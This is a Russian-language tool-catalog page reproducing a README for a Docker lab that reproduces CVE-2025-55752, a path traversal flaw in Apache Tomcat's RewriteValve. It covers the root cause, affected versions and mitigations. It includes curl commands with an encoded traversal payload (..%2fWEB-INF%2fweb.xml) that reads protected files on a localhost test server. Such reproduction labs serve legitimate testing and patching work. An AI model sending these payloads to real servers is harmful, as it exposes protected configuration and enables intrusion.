Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55752 — Docker-среда воспроизведения для CVE-2025-55752, уязвимости обхода пути в RewriteValve Apache Tomcat, демонстрирующая ошибку нормализации до декодирования и предоставляющая команды для тестирования. | Kitploit
Инструменты/GitHubGitHub/masahiro331/cve-2025-55752
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

Docker-среда воспроизведения для CVE-2025-55752, уязвимости обхода пути в RewriteValve Apache Tomcat, демонстрирующая ошибку нормализации до декодирования и предоставляющая команды для тестирования.

Репозиторий
14310 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55752: Уязвимость обхода пути в Apache Tomcat

Среда воспроизведения на базе Docker для CVE-2025-55752 — уязвимости обхода пути в Apache Tomcat 10.1.44.

Обзор

CVE-2025-55752 — это уязвимость обхода пути в RewriteValve Apache Tomcat, вызванная некорректным порядком обработки: нормализация URL происходит до декодирования URL. Это позволяет злоумышленникам обходить ограничения безопасности, защищающие каталоги вроде /WEB-INF/, с помощью URL-кодированных последовательностей обхода пути (..%2f).

Характеристики уязвимости

  • CVE ID: CVE-2025-55752
  • CVSS v3.1: 7.5 (ВЫСОКИЙ)
  • CWE: CWE-22 (Обход пути)
  • Компонент: Apache Tomcat RewriteValve
  • Корневая причина: порядок обработки «нормализация до декодирования»

Затронутые версии

СерияУязвимые версииИсправленная версия
11.x11.0.0-M1 — 11.0.1011.0.11+
10.1.x10.1.0-M1 — 10.1.4410.1.45+
9.0.x9.0.0-M11 — 9.0.1089.0.109+
8.5.x8.5.6 — 8.5.100EOL — исправления нет

Быстрый старт

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

Тестирование уязвимости

Тест 1: Прямой доступ к WEB-INF (защищён)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

Ожидаемый результат: 403 Forbidden

Тест 2: Раскрытие информации (чтение защищённых файлов)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

Ожидаемый результат: 200 OK + содержимое web.xml (уязвимость подтверждена)

Как это работает

  1. Запрос: /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve переписывает на: /files/..%2fWEB-INF%2fweb.xml
  3. Нормализация URL (до декодирования): %2f не распознаётся как /, .. сохраняется
  4. Декодирование URL: %2f → / → /files/../WEB-INF/web.xml
  5. Разрешение пути: /WEB-INF/web.xml

Проблема порядка обработки

root@kitploit:~
Правильно:    Декодирование → Нормализация → Проверка безопасности
Уязвимо: Нормализация → Декодирование → Проверка безопасности ✗

Исправление в Tomcat

  • GitHub: apache/tomcat commit 130d36d8
  • Исправление: декодирование перед нормализацией

Меры по снижению риска

  1. Отключите RewriteValve, если он не требуется
  2. Отключите метод PUT
  3. Правила WAF для блокировки ../ и %2e%2e
  4. Обновитесь до исправленных версий (10.1.45+, 9.0.109+, 11.0.11+)

Ссылки

  • Безопасность Apache Tomcat
  • NVD — CVE-2025-55752
  • OWASP Path Traversal
  • CWE-22: Некорректное ограничение имени пути

Отказ от ответственности

⚠️ ПРЕДУПРЕЖДЕНИЕ: Не разворачивайте в производственной среде. Используйте только в изолированных тестовых средах.

Скачать инструмент